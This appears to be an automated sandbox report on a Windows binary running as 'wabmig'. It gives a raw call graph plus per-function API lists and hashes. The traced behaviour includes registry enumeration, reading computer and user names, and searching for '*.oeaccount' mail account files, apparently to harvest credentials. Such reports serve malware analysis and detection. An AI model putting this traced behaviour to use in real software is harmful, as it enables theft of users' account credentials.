40c538 33460->33462 33607 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33460->33607 33461->33460 33600 409b31 33462->33600 33466 40ba28 33467 40ba87 33466->33467 33473 40ba3c 33466->33473 33610 406c62 LoadCursorA SetCursor 33467->33610 33469 40ba8c 33611 4107f1 33469->33611 33614 410a9c RegOpenKeyExA 33469->33614 33615 404734 33469->33615 33623 404785 33469->33623 33626 403c16 33469->33626 33470 40ba43 _mbsicmp 33470->33473 33471 40baa0 33472 407e30 _strcmpi 33471->33472 33476 40bab0 33472->33476 33473->33467 33473->33470 33702 40b5e5 10 API calls 33473->33702 33474 40bafa SetCursor 33474->33339 33476->33474 33477 40baf1 qsort 33476->33477 33477->33474 34060 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33483->34060 33485 40b00e 33486 40b016 33485->33486 33487 40b01f GetStdHandle 33485->33487 34061 406d1a CreateFileA 33486->34061 33488 40b01c 33487->33488 33490 40b035 33488->33490 33491 40b12d 33488->33491 34062 406c62 LoadCursorA SetCursor 33490->34062 34066 406d77 9 API calls 33491->34066 33494 40b136 33505 40c580 28 API calls 33494->33505 33495 40b087 33502 40b0a1 33495->33502 34064 40a699 12 API calls 33495->34064 33496 40b042 33496->33495 33496->33502 34063 40a57c strlen WriteFile 33496->34063 33499 40b0d6 33500 40b116 CloseHandle 33499->33500 33501 40b11f SetCursor 33499->33501 33500->33501 33501->33494 33502->33499 34065 406d77 9 API calls 33502->34065 33504->33333 33505->33336 33518 409a32 33506->33518 33509 409c80 memcpy memcpy 33512 409cda 33509->33512 33510 408db6 12 API calls 33510->33512 33511 409d18 ??2@YAPAXI ??2@YAPAXI 33513 409d54 ??2@YAPAXI 33511->33513 33516 409d8b 33511->33516 33512->33509 33512->33510 33512->33511 33513->33516 33516->33516 33528 409b9c 33516->33528 33517 4023c1 33517->33418 33519 409a44 33518->33519 33520 409a3d ??3@YAXPAX 33518->33520 33521 409a52 33519->33521 33522 409a4b ??3@YAXPAX 33519->33522 33520->33519 33523 409a5c ??3@YAXPAX 33521->33523 33525 409a63 33521->33525 33522->33521 33523->33525 33524 409a83 ??2@YAPAXI ??2@YAPAXI 33524->33509 33525->33524 33526 409a73 ??3@YAXPAX 33525->33526 33527 409a7c ??3@YAXPAX 33525->33527 33526->33527 33527->33524 33529 407a55 free 33528->33529 33530 409ba5 33529->33530 33531 407a55 free 33530->33531 33532 409bad 33531->33532 33533 407a55 free 33532->33533 33534 409bb5 33533->33534 33535 407a55 free 33534->33535 33536 409bbd 33535->33536 33537 407a1f 4 API calls 33536->33537 33538 409bd0 33537->33538 33539 407a1f 4 API calls 33538->33539 33540 409bda 33539->33540 33541 407a1f 4 API calls 33540->33541 33542 409be4 33541->33542 33543 407a1f 4 API calls 33542->33543 33544 409bee 33543->33544 33544->33517 33546 410d0e 2 API calls 33545->33546 33547 410dca 33546->33547 33548 410dfd memset 33547->33548 33587 4070ae 33547->33587 33550 410e1d 33548->33550 33590 410a9c RegOpenKeyExA 33550->33590 33553 401e9e strlen strlen 33553->33421 33553->33422 33554 410e4a 33555 410e7f _mbscpy 33554->33555 33591 410d3d _mbscpy 33554->33591 33555->33553 33557 410e5b 33592 410add RegQueryValueExA 33557->33592 33559 410e73 RegCloseKey 33559->33555 33560->33425 33561->33431 33593 410a9c RegOpenKeyExA 33562->33593 33564 401c4c 33565 401cad 33564->33565 33594 410add RegQueryValueExA 33564->33594 33565->33434 33565->33435 33567 401c6a 33568 401c71 strchr 33567->33568 33569 401ca4 RegCloseKey 33567->33569 33568->33569 33570 401c85 strchr 33568->33570 33569->33565 33570->33569 33571 401c94 33570->33571 33595 406f06 strlen 33571->33595 33573 401ca1 33573->33569 33574->33437 33575->33422 33576->33428 33577->33449 33598 410a9c RegOpenKeyExA 33578->33598 33580 410b34 33581 410b5d 33580->33581 33599 410add RegQueryValueExA 33580->33599 33581->33449 33583 410b4c RegCloseKey 33583->33581 33585->33449 33586->33441 33588 4070bd GetVersionExA 33587->33588 33589 4070ce 33587->33589 33588->33589 33589->33548 33589->33553 33590->33554 33591->33557 33592->33559 33593->33564 33594->33567 33596 406f17 33595->33596 33597 406f1a memcpy 33595->33597 33596->33597 33597->33573 33598->33580 33599->33583 33601 409b40 33600->33601 33603 409b4e 33600->33603 33608 409901 memset SendMessageA 33601->33608 33604 409b99 33603->33604 33605 409b8b 33603->33605 33604->33466 33609 409868 SendMessageA 33605->33609 33607->33462 33608->33603 33609->33604 33610->33469 33612 410807 33611->33612 33613 4107fc FreeLibrary 33611->33613 33612->33471 33613->33612 33614->33471 33616 404785 FreeLibrary 33615->33616 33617 40473b LoadLibraryA 33616->33617 33618 40474c GetProcAddress 33617->33618 33621 40476e 33617->33621 33619 404764 33618->33619 33618->33621 33619->33621 33620 404781 33620->33471 33621->33620 33622 404785 FreeLibrary 33621->33622 33622->33620 33624 4047a3 33623->33624 33625 404799 FreeLibrary 33623->33625 33624->33471 33625->33624 33627 4107f1 FreeLibrary 33626->33627 33628 403c30 LoadLibraryA 33627->33628 33629 403c74 33628->33629 33630 403c44 GetProcAddress 33628->33630 33632 4107f1 FreeLibrary 33629->33632 33630->33629 33631 403c5e 33630->33631 33631->33629 33635 403c6b 33631->33635 33633 403c7b 33632->33633 33634 404734 3 API calls 33633->33634 33636 403c86 33634->33636 33635->33633 33703 4036e5 33636->33703 33639 4036e5 27 API calls 33640 403c9a 33639->33640 33641 4036e5 27 API calls 33640->33641 33642 403ca4 33641->33642 33643 4036e5 27 API calls 33642->33643 33644 403cae 33643->33644 33715 4085d2 33644->33715 33652 403ce5 33653 403cf7 33652->33653 33896 402bd1 40 API calls 33652->33896 33761 410a9c RegOpenKeyExA 33653->33761 33656 403d0a 33657 403d1c 33656->33657 33897 402bd1 40 API calls 33656->33897 33762 402c5d 33657->33762 33661 4070ae GetVersionExA 33662 403d31 33661->33662 33780 410a9c RegOpenKeyExA 33662->33780 33664 403d51 33665 403d61 33664->33665 33898 402b22 47 API calls 33664->33898 33781 410a9c RegOpenKeyExA 33665->33781 33668 403d87 33669 403d97 33668->33669 33899 402b22 47 API calls 33668->33899 33782 410a9c RegOpenKeyExA 33669->33782 33672 403dbd 33673 403dcd 33672->33673 33900 402b22 47 API calls 33672->33900 33783 410808 33673->33783 33677 404785 FreeLibrary 33678 403de8 33677->33678 33787 402fdb 33678->33787 33681 402fdb 34 API calls 33682 403e00 33681->33682 33803 4032b7 33682->33803 33691 403e3b 33693 403e73 33691->33693 33694 403e46 _mbscpy 33691->33694 33850 40fb00 33693->33850 33902 40f334 335 API calls 33694->33902 33702->33473 33704 4037c5 33703->33704 33705 4036fb 33703->33705 33704->33639 33903 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33705->33903 33707 40370e 33707->33704 33708 403716 strchr 33707->33708 33708->33704 33709 403730 33708->33709 33904 4021b6 memset 33709->33904 33711 40373f _mbscpy _mbscpy strlen 33712 4037a4 _mbscpy 33711->33712 33713 403789 sprintf 33711->33713 33905 4023e5 16 API calls 33712->33905 33713->33712 33716 4085e2 33715->33716 33906 4082cd 11 API calls 33716->33906 33720 408600 33721 403cba 33720->33721 33722 40860b memset 33720->33722 33733 40821d 33721->33733 33909 410b62 RegEnumKeyExA 33722->33909 33724 4086d2 RegCloseKey 33724->33721 33726 408637 33726->33724 33727 40865c memset 33726->33727 33910 410a9c RegOpenKeyExA 33726->33910 33913 410b62 RegEnumKeyExA 33726->33913 33911 410add RegQueryValueExA 33727->33911 33730 408694 33912 40848b 10 API calls 33730->33912 33732 4086ab RegCloseKey 33732->33726 33914 410a9c RegOpenKeyExA 33733->33914 33735 40823f 33736 403cc6 33735->33736 33737 408246 memset 33735->33737 33745 4086e0 33736->33745 33915 410b62 RegEnumKeyExA 33737->33915 33739 4082bf RegCloseKey 33739->33736 33741 40826f 33741->33739 33916 410a9c RegOpenKeyExA 33741->33916 33917 4080ed 11 API calls 33741->33917 33918 410b62 RegEnumKeyExA 33741->33918 33744 4082a2 RegCloseKey 33744->33741 33919 4045db 33745->33919 33747 4088ef 33927 404656 33747->33927 33751 408737 wcslen 33751->33747 33757 40876a 33751->33757 33752 40877a wcsncmp 33752->33757 33754 404734 3 API calls 33754->33757 33755 404785 FreeLibrary 33755->33757 33756 408812 memset 33756->33757 33758 40883c memcpy wcschr 33756->33758 33757->33747 33757->33752 33757->33754 33757->33755 33757->33756 33757->33758 33759 4088c3 LocalFree 33757->33759 33930 40466b _mbscpy 33757->33930 33758->33757 33759->33757 33760 410a9c RegOpenKeyExA 33760->33652 33761->33656 33931 410a9c RegOpenKeyExA 33762->33931 33764 402c7a 33765 402da5 33764->33765 33766 402c87 memset 33764->33766 33765->33661 33932 410b62 RegEnumKeyExA 33766->33932 33768 402d9c RegCloseKey 33768->33765 33769 410b1e 3 API calls 33770 402ce4 memset sprintf 33769->33770 33933 410a9c RegOpenKeyExA 33770->33933 33772 402d28 33773 402d3a sprintf 33772->33773 33934 402bd1 40 API calls 33772->33934 33935 410a9c RegOpenKeyExA 33773->33935 33778 402cb2 33778->33768 33778->33769 33779 402d9a 33778->33779 33936 402bd1 40 API calls 33778->33936 33937 410b62 RegEnumKeyExA 33778->33937 33779->33768 33780->33664 33781->33668 33782->33672 33784 410816 33783->33784 33785 4107f1 FreeLibrary 33784->33785 33786 403ddd 33785->33786 33786->33677 33938 410a9c RegOpenKeyExA 33787->33938 33789 402ff9 33790 403006 memset 33789->33790 33791 40312c 33789->33791 33939 410b62 RegEnumKeyExA 33790->33939 33791->33681 33793 403122 RegCloseKey 33793->33791 33794 410b1e 3 API calls 33795 403058 memset sprintf 33794->33795 33940 410a9c RegOpenKeyExA 33795->33940 33797 4030a2 memset 33941 410b62 RegEnumKeyExA 33797->33941 33799 4030f9 RegCloseKey 33801 403033 33799->33801 33801->33793 33801->33794 33801->33797 33801->33799 33802 410b62 RegEnumKeyExA 33801->33802 33942 402db3 26 API calls 33801->33942 33802->33801 33804 4032d5 33803->33804 33805 4033a9 33803->33805 33943 4021b6 memset 33804->33943 33818 4034e4 memset memset 33805->33818 33807 4032e1 33944 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33807->33944 33809 4032ea 33810 4032f8 memset GetPrivateProfileSectionA 33809->33810 33945 4023e5 16 API calls 33809->33945 33810->33805 33815 40332f 33810->33815 33812 40339b strlen 33812->33805 33812->33815 33814 403350 strchr 33814->33815 33815->33805 33815->33812 33946 4021b6 memset 33815->33946 33947 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33815->33947 33948 4023e5 16 API calls 33815->33948 33819 410b1e 3 API calls 33818->33819 33820 40353f 33819->33820 33821 40357f 33820->33821 33822 403546 _mbscpy 33820->33822 33826 403985 33821->33826 33949 406d55 strlen _mbscat 33822->33949 33824 403565 _mbscat 33950 4033f0 19 API calls 33824->33950 33951 40466b _mbscpy 33826->33951 33830 4039aa 33831 4039ff 33830->33831 33952 40f460 memset memset 33830->33952 33973 40f6e2 33830->33973 33989 4038e8 21 API calls 33830->33989 33833 404785 FreeLibrary 33831->33833 33834 403a0b 33833->33834 33835 4037ca memset memset 33834->33835 33997 444551 memset 33835->33997 33837 4038e2 33837->33691 33901 40f334 335 API calls 33837->33901 33840 40382e 33841 406f06 2 API calls 33840->33841 33842 403843 33841->33842 33843 406f06 2 API calls 33842->33843 33844 403855 strchr 33843->33844 33845 403884 _mbscpy 33844->33845 33846 403897 strlen 33844->33846 33847 4038bf _mbscpy 33845->33847 33846->33847 33848 4038a4 sprintf 33846->33848 34009 4023e5 16 API calls 33847->34009 33848->33847 33851 44b090 33850->33851 33852 40fb10 RegOpenKeyExA 33851->33852 33853 403e7f 33852->33853 33854 40fb3b RegOpenKeyExA 33852->33854 33864 40f96c 33853->33864 33855 40fb55 RegQueryValueExA 33854->33855 33856 40fc2d RegCloseKey 33854->33856 33857 40fc23 RegCloseKey 33855->33857 33858 40fb84 33855->33858 33856->33853 33857->33856 33859 404734 3 API calls 33858->33859 33860 40fb91 33859->33860 33860->33857 33861 40fc19 LocalFree 33860->33861 33862 40fbdd memcpy memcpy 33860->33862 33861->33857 34014 40f802 11 API calls 33862->34014 33865 4070ae GetVersionExA 33864->33865 33866 40f98d 33865->33866 33867 4045db 7 API calls 33866->33867 33875 40f9a9 33867->33875 33868 40fae6 33869 404656 FreeLibrary 33868->33869 33870 403e85 33869->33870 33876 4442ea memset 33870->33876 33871 40fa13 memset WideCharToMultiByte 33872 40fa43 _strnicmp 33871->33872 33871->33875 33873 40fa5b WideCharToMultiByte 33872->33873 33872->33875 33874 40fa88 WideCharToMultiByte 33873->33874 33873->33875 33874->33875 33875->33868 33875->33871 33877 410dbb 9 API calls 33876->33877 33878 444329 33877->33878 34015 40759e strlen strlen 33878->34015 33883 410dbb 9 API calls 33884 444350 33883->33884 33885 40759e 3 API calls 33884->33885 33886 44435a 33885->33886 33887 444212 65 API calls 33886->33887 33888 444366 memset memset 33887->33888 33889 410b1e 3 API calls 33888->33889 33890 4443b9 ExpandEnvironmentStringsA strlen 33889->33890 33891 4443f4 _strcmpi 33890->33891 33892 4443e5 33890->33892 33893 403e91 33891->33893 33894 44440c 33891->33894 33892->33891 33893->33471 33895 444212 65 API calls 33894->33895 33895->33893 33896->33653 33897->33657 33898->33665 33899->33669 33900->33673 33901->33691 33902->33693 33903->33707 33904->33711 33905->33704 33907 40841c 33906->33907 33908 410a9c RegOpenKeyExA 33907->33908 33908->33720 33909->33726 33910->33726 33911->33730 33912->33732 33913->33726 33914->33735 33915->33741 33916->33741 33917->33744 33918->33741 33920 404656 FreeLibrary 33919->33920 33921 4045e3 LoadLibraryA 33920->33921 33922 404651 33921->33922 33923 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33921->33923 33922->33747 33922->33751 33924 40463d 33923->33924 33925 404643 33924->33925 33926 404656 FreeLibrary 33924->33926 33925->33922 33926->33922 33928 403cd2 33927->33928 33929 40465c FreeLibrary 33927->33929 33928->33760 33929->33928 33930->33757 33931->33764 33932->33778 33933->33772 33934->33773 33935->33778 33936->33778 33937->33778 33938->33789 33939->33801 33940->33801 33941->33801 33942->33801 33943->33807 33944->33809 33945->33810 33946->33814 33947->33815 33948->33815 33949->33824 33950->33821 33951->33830 33990 4078ba 33952->33990 33955 4078ba _mbsnbcat 33956 40f5a3 RegOpenKeyExA 33955->33956 33957 40f5c3 RegQueryValueExA 33956->33957 33958 40f6d9 33956->33958 33959 40f6d0 RegCloseKey 33957->33959 33960 40f5f0 33957->33960 33958->33830 33959->33958 33960->33959 33961 40f675 33960->33961 33994 40466b _mbscpy 33960->33994 33961->33959 33995 4012ee strlen 33961->33995 33963 40f611 33965 404734 3 API calls 33963->33965 33967 40f616 33965->33967 33966 40f69e RegQueryValueExA 33966->33959 33968 40f6c1 33966->33968 33969 40f66a 33967->33969 33971 40f661 LocalFree 33967->33971 33972 40f645 memcpy 33967->33972 33968->33959 33970 404785 FreeLibrary 33969->33970 33970->33961 33971->33969 33972->33971 33996 40466b _mbscpy 33973->33996 33975 40f6fa 33976 4045db 7 API calls 33975->33976 33977 40f708 33976->33977 33978 404734 3 API calls 33977->33978 33983 40f7e2 33977->33983 33984 40f715 33978->33984 33979 404656 FreeLibrary 33980 40f7f1 33979->33980 33981 404785 FreeLibrary 33980->33981 33982 40f7fc 33981->33982 33982->33830 33983->33979 33984->33983 33985 40f797 WideCharToMultiByte 33984->33985 33986 40f7b8 strlen 33985->33986 33987 40f7d9 LocalFree 33985->33987 33986->33987 33988 40f7c8 _mbscpy 33986->33988 33987->33983 33988->33987 33989->33830 33991 4078e6 33990->33991 33992 4078c7 _mbsnbcat 33991->33992 33993 4078ea 33991->33993 33992->33991 33993->33955 33994->33963 33995->33966 33996->33975 34010 410a9c RegOpenKeyExA 33997->34010 33999 44458b 34000 40381a 33999->34000 34011 410add RegQueryValueExA 33999->34011 34000->33837 34008 4021b6 memset 34000->34008 34002 4445a4 34003 4445dc RegCloseKey 34002->34003 34012 410add RegQueryValueExA 34002->34012 34003->34000 34005 4445c1 34005->34003 34013 444879 30 API calls 34005->34013 34007 4445da 34007->34003 34008->33840 34009->33837 34010->33999 34011->34002 34012->34005 34013->34007 34014->33861 34016 4075c9 34015->34016 34017 4075bb _mbscat 34015->34017 34018 444212 34016->34018 34017->34016 34035 407e9d 34018->34035 34021 44424d 34022 444274 34021->34022 34023 444258 34021->34023 34043 407ef8 34021->34043 34024 407e9d 9 API calls 34022->34024 34056 444196 52 API calls 34023->34056 34031 4442a0 34024->34031 34026 407ef8 9 API calls 34026->34031 34027 4442ce 34053 407f90 34027->34053 34031->34026 34031->34027 34033 444212 65 API calls 34031->34033 34057 407e62 strcmp strcmp 34031->34057 34032 407f90 FindClose 34034 4442e4 34032->34034 34033->34031 34034->33883 34036 407f90 FindClose 34035->34036 34037 407eaa 34036->34037 34038 406f06 2 API calls 34037->34038 34039 407ebd strlen strlen 34038->34039 34040 407ee1 34039->34040 34041 407eea 34039->34041 34058 4070e3 strlen _mbscat _mbscpy _mbscat 34040->34058 34041->34021 34044 407f03 FindFirstFileA 34043->34044 34045 407f24 FindNextFileA 34043->34045 34046 407f3f 34044->34046 34047 407f46 strlen strlen 34045->34047 34048 407f3a 34045->34048 34046->34047 34052 407f7f 34046->34052 34050 407f76 34047->34050 34047->34052 34049 407f90 FindClose 34048->34049 34049->34046 34059 4070e3 strlen _mbscat _mbscpy _mbscat 34050->34059 34052->34021 34054 407fa3 34053->34054 34055 407f99 FindClose 34053->34055 34054->34032 34055->34054 34056->34021 34057->34031 34058->34041 34059->34052 34060->33485 34061->33488 34062->33496 34063->33495 34064->33502 34065->33499 34066->33494 34075 411853 RtlInitializeCriticalSection memset 34076 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34250 40a256 13 API calls 34252 432e5b 17 API calls 34254 43fa5a 20 API calls 34078 401060 41 API calls 34257 427260 CloseHandle memset memset 34082 405868 9 API calls 33159 410c68 FindResourceA 33160 410c81 SizeofResource 33159->33160 33161 410cae 33159->33161 33160->33161 33162 410c92 LoadResource 33160->33162 33162->33161 33163 410ca0 LockResource 33162->33163 33163->33161 34259 405e69 14 API calls 34084 433068 15 API calls __fprintf_l 34261 414a6d 18 API calls 34262 43fe6f 135 API calls 34086 424c6d 15 API calls __fprintf_l 34263 426741 19 API calls 34088 440c70 17 API calls 34089 443c71 44 API calls 34092 427c79 24 API calls 34266 416e7e memset __fprintf_l 34096 42800b 47 API calls 34097 425115 85 API calls __fprintf_l 34269 41960c 61 API calls 34098 43f40c 123 API calls __fprintf_l 34101 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34102 43f81a 20 API calls 34104 414c20 memset memset 34105 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34273 414625 18 API calls 34274 404225 modf 34275 403a26 strlen WriteFile 34277 40422a 12 API calls 34281 427632 memset memset memcpy 34282 40ca30 59 API calls 34283 404235 26 API calls 34106 42ec34 61 API calls __fprintf_l 34107 425115 76 API calls __fprintf_l 34284 425115 77 API calls __fprintf_l 34286 44223a 38 API calls 34113 43183c 113 API calls 34287 44b2c5 _onexit __dllonexit 34292 42a6d2 memcpy __allrem 34115 405cda 65 API calls 34300 43fedc 139 API calls 34301 4116e1 16 API calls __fprintf_l 34118 4244e6 19 API calls 34120 42e8e8 128 API calls __fprintf_l 34121 4118ee RtlLeaveCriticalSection 34306 43f6ec 22 API calls 34123 425115 119 API calls __fprintf_l 33149 410cf3 EnumResourceNamesA 34309 4492f0 memcpy memcpy 34311 43fafa 18 API calls 34313 4342f9 15 API calls __fprintf_l 34124 4144fd 19 API calls 34315 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34316 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34319 443a84 _mbscpy 34321 43f681 17 API calls 34127 404487 22 API calls 34323 415e8c 16 API calls __fprintf_l 34131 411893 RtlDeleteCriticalSection __fprintf_l 34132 41a492 42 API calls 34327 403e96 34 API calls 34328 410e98 memset SHGetPathFromIDList SendMessageA 34134 426741 110 API calls __fprintf_l 34135 4344a2 18 API calls 34136 4094a2 10 API calls 34331 4116a6 15 API calls __fprintf_l 34332 43f6a4 17 API calls 34333 440aa3 20 API calls 34335 427430 45 API calls 34139 4090b0 7 API calls 34140 4148b0 15 API calls 34142 4118b4 RtlEnterCriticalSection 34143 4014b7 CreateWindowExA 34144 40c8b8 19 API calls 34146 4118bf RtlTryEnterCriticalSection 34340 42434a 18 API calls __fprintf_l 34342 405f53 12 API calls 34154 43f956 60 API calls 34156 40955a 17 API calls 34157 428561 36 API calls 34158 409164 7 API calls 34346 404366 19 API calls 34350 40176c ExitProcess 34353 410777 42 API calls 34163 40dd7b 51 API calls 34164 425d7c 16 API calls __fprintf_l 34355 43f6f0 25 API calls 34356 42db01 22 API calls 34165 412905 15 API calls __fprintf_l 34357 403b04 54 API calls 34358 405f04 SetDlgItemTextA GetDlgItemTextA 34359 44b301 ??3@YAXPAX 34362 4120ea 14 API calls 3 library calls 34363 40bb0a 8 API calls 34365 413f11 strcmp 34169 434110 17 API calls __fprintf_l 34172 425115 108 API calls __fprintf_l 34366 444b11 _onexit 34174 425115 76 API calls __fprintf_l 34177 429d19 10 API calls 34369 444b1f __dllonexit 34370 409f20 _strcmpi 34179 42b927 31 API calls 34373 433f26 19 API calls __fprintf_l 34374 44b323 FreeLibrary 34375 427f25 46 API calls 34376 43ff2b 17 API calls 34377 43fb30 19 API calls 34186 414d36 16 API calls 34188 40ad38 7 API calls 34379 433b38 16 API calls __fprintf_l 34380 44b33b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 34192 426741 21 API calls 34193 40c5c3 125 API calls 34195 43fdc5 17 API calls 34381 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34198 4161cb memcpy memcpy memcpy memcpy 33164 44b3cf 33165 44b3e6 33164->33165 33168 44b454 33164->33168 33165->33168 33171 44b40e 33165->33171 33167 44b405 33167->33168 33169 44b435 VirtualProtect 33167->33169 33169->33168 33170 44b444 VirtualProtect 33169->33170 33170->33168 33172 44b413 33171->33172 33175 44b454 33172->33175 33178 44b42b 33172->33178 33174 44b41c 33174->33175 33176 44b435 VirtualProtect 33174->33176 33176->33175 33177 44b444 VirtualProtect 33176->33177 33177->33175 33179 44b431 33178->33179 33180 44b435 VirtualProtect 33179->33180 33182 44b454 33179->33182 33181 44b444 VirtualProtect 33180->33181 33180->33182 33181->33182 34386 43ffc8 18 API calls 34199 4281cc 15 API calls __fprintf_l 34388 4383cc 111 API calls __fprintf_l 34200 4275d3 41 API calls 34389 4153d3 22 API calls __fprintf_l 34201 444dd7 _XcptFilter 34394 4013de 15 API calls 34396 425115 111 API calls __fprintf_l 34397 43f7db 18 API calls 34400 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34203 4335ee 16 API calls __fprintf_l 34402 429fef 11 API calls 34204 444deb _exit _c_exit 34403 40bbf0 138 API calls 34207 425115 79 API calls __fprintf_l 34407 437ffa 22 API calls 34211 4021ff 14 API calls 34212 43f5fc 150 API calls 34408 40e381 9 API calls 34214 405983 28 API calls 34215 42b186 27 API calls __fprintf_l 34216 427d86 76 API calls 34217 403585 20 API calls 34219 42e58e 18 API calls __fprintf_l 34222 425115 75 API calls __fprintf_l 34224 401592 8 API calls 33150 410b92 33153 410a6b 33150->33153 33152 410bb2 33154 410a77 33153->33154 33155 410a89 GetPrivateProfileIntA 33153->33155 33158 410983 memset _itoa WritePrivateProfileStringA 33154->33158 33155->33152 33157 410a84 33157->33152 33158->33157 34412 434395 16 API calls 34226 441d9c memcmp 34227 40c599 43 API calls 34415 426741 87 API calls 34231 4401a6 21 API calls 34233 426da6 memcpy memset memset memcpy 34234 4335a5 15 API calls 34236 4299ab memset memset memcpy memset memset 34237 40b1ab 8 API calls 34420 425115 76 API calls __fprintf_l 34422 43f7b2 120 API calls 34424 4113b2 18 API calls 2 library calls 34428 40a3b8 memset sprintf SendMessageA 33183 410bbc 33186 4109cf 33183->33186 33187 4109dc 33186->33187 33188 410a23 memset GetPrivateProfileStringA 33187->33188 33189 4109ea memset 33187->33189 33194 407646 strlen 33188->33194 33199 4075cd sprintf memcpy 33189->33199 33192 410a0c WritePrivateProfileStringA 33193 410a65 33192->33193 33195 40765a 33194->33195 33196 40765c 33194->33196 33195->33193 33197 4076a3 33196->33197 33200 40737c strtoul 33196->33200 33197->33193 33199->33192 33200->33196 34239 40b5bf memset memset _mbsicmp

                                                                            Executed Functions

                                                                            Function 004082CD Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 145stringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040832F
                                                                            • memset.MSVCRT ref: 00408343
                                                                            • memset.MSVCRT ref: 0040835F
                                                                            • memset.MSVCRT ref: 00408376
                                                                            • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                            • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                            • strlen.MSVCRT ref: 004083E9
                                                                            • strlen.MSVCRT ref: 004083F8
                                                                            • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                            • String ID: 5$H$O$b$i$}$}
                                                                            • API String ID: 1832431107-3760989150
                                                                            • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                            • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                            • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                            • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                                            Function 00407EF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 443 407ef8-407f01 444 407f03-407f22 FindFirstFileA 443->444 445 407f24-407f38 FindNextFileA 443->445 446 407f3f-407f44 444->446 447 407f46-407f74 strlen * 2 445->447 448 407f3a call 407f90 445->448 446->447 450 407f89-407f8f 446->450 451 407f83 447->451 452 407f76-407f81 call 4070e3 447->452 448->446 453 407f86-407f88 451->453 452->453 453->450
                                                                            APIs
                                                                            • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                            • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                            • strlen.MSVCRT ref: 00407F5C
                                                                            • strlen.MSVCRT ref: 00407F64
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: FileFindstrlen$FirstNext
                                                                            • String ID: ACD
                                                                            • API String ID: 379999529-620537770
                                                                            • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                            • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                            • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                            • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
                                                                            Function 00401E69 Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261stringregistryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • memset.MSVCRT ref: 00401E8B
                                                                            • strlen.MSVCRT ref: 00401EA4
                                                                            • strlen.MSVCRT ref: 00401EB2
                                                                            • strlen.MSVCRT ref: 00401EF8
                                                                            • strlen.MSVCRT ref: 00401F06
                                                                            • memset.MSVCRT ref: 00401FB1
                                                                            • atoi.MSVCRT(?), ref: 00401FE0
                                                                            • memset.MSVCRT ref: 00402003
                                                                            • sprintf.MSVCRT ref: 00402030
                                                                              • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                            • memset.MSVCRT ref: 00402086
                                                                            • memset.MSVCRT ref: 0040209B
                                                                            • strlen.MSVCRT ref: 004020A1
